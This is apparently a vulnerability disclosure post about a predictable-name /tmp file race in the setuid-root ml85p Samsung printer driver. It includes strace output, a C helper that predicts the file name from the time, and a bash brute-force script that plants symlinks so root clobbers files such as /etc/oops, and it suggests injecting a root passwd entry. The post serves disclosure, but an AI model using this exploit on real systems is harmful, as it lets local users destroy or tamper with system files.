ml85p - driver for Samsung ML-85G and /tmp

[KF <dotslash () snosoft com>]

ml85p - driver for Samsung ML-85G GDI printers seems to use /tmp unsecurely.
it seems to use the time() function to determine the /tmp files name. 

[root@linux exp]# strings /usr/bin/ml85p | grep tmp
/tmp/ml85g%d

[401070dd] iopl(0x3)                    = 0
[400cf2bd] time(NULL)                   = 994462668
[40100cbf] brk(0)                       = 0x8064544
[40100cbf] brk(0x80646c4)               = 0x80646c4
[40100cbf] brk(0x8065000)               = 0x8065000
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

TIME(2)             Linux Programmer's Manual             TIME(2)

NAME
       time - get time in seconds

SYNOPSIS
       #include <time.h>

       time_t time(time_t *t);

DESCRIPTION
       time  returns  the  time since the Epoch (00:00:00 UTC, January 1, 1970), mea-
       sured in seconds.

[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462666
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462667
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462668

This is trivial... root must run the following command. 
[root@linux exp]# /usr/bin/ml85p -s 

-s simulate the printing  process,  but  write  the  compressed  output  to  a
       /tmp/ml85xxxxxxxx  file,  where  the  filename  suffix  is the current time in
       time_t units (seconds since 12/31/1970).

as you can see this is the one that hits us... 
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

oh how nice truncation flag... 

O_TRUNC
       If  the  file  already  exists  and is a regular file and the open mode
       allows writing (i.e., is O_RDWR or O_WRONLY) it will  be  truncated  to
       length  0.  

[root@linux exp]# ls -al /tmp | grep ml  
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462665
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462666 -> /etc/test
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462667 -> /etc/test
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462668 -> /etc/test
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462669
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462670

[d0tslash@linux d0tslash]$ ls -al /etc/test
-rw-r--r--    1 root     root            0 Jul  6 19:37 /etc/test

I am not sure what other OS's pick for permissions by defualt... 
mandrake seems to not allow user access by default ... I don't know 
what group you need to have access to use this feature.

[d0tslash@linux d0tslash]$ /usr/bin/ml85p
bash: /usr/bin/ml85p: Permission denied

[d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
-rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*

for shits and giggles lets see what happens if its got bad perms. 
[root@linux exp]# chmod 4755 /usr/bin/ml85p   

in which case the results are as follows 

[d0tslash@linux d0tslash]$ /usr/bin/ml85p -s (several times)
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463605
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463607
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463608
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463609

[d0tslash@linux d0tslash]$ cat ml85p-exp.c   
// ln -s /etc/oops /tmp/ml85`./ml85p-exp`
 
#include <time.h>
#include <stdio.h>
int main(int argc,char **argv)
{
int x = time(NULL);
x = x + 30;
printf("%i\n", x);
}

[d0tslash@linux d0tslash]$ cat ml85p.sh
#!/bin/bash
# krfinisterre () checkfree com
echo "brute.sh <low> <hi>"
L=$1
H=$2
while [ $L -lt $H ]
do
        ln -s /etc/oops /tmp/ml85g`./ml85p-exp`
        let L=L+1
done

the following file is created. 
-rw-r--r--    1 root     d0tslash        0 Jul  6 20:18 /etc/oops

not sure what use this is short of clobbering files... since the output is sent to this file it may be possible to 
print 
owned::0:0:root:/root:/bin/bash  to this driver and it may append it to the file in /tmp... I am not sure though... 
just an idea
-KF